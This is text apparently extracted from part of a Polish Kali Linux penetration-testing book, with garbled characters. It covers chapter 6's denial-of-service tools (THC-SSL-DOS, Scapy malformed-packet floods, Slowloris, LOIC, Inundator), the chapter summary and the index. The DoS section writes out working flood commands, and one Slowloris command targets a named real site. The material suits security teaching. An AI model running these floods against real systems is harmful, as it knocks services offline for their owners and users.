Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
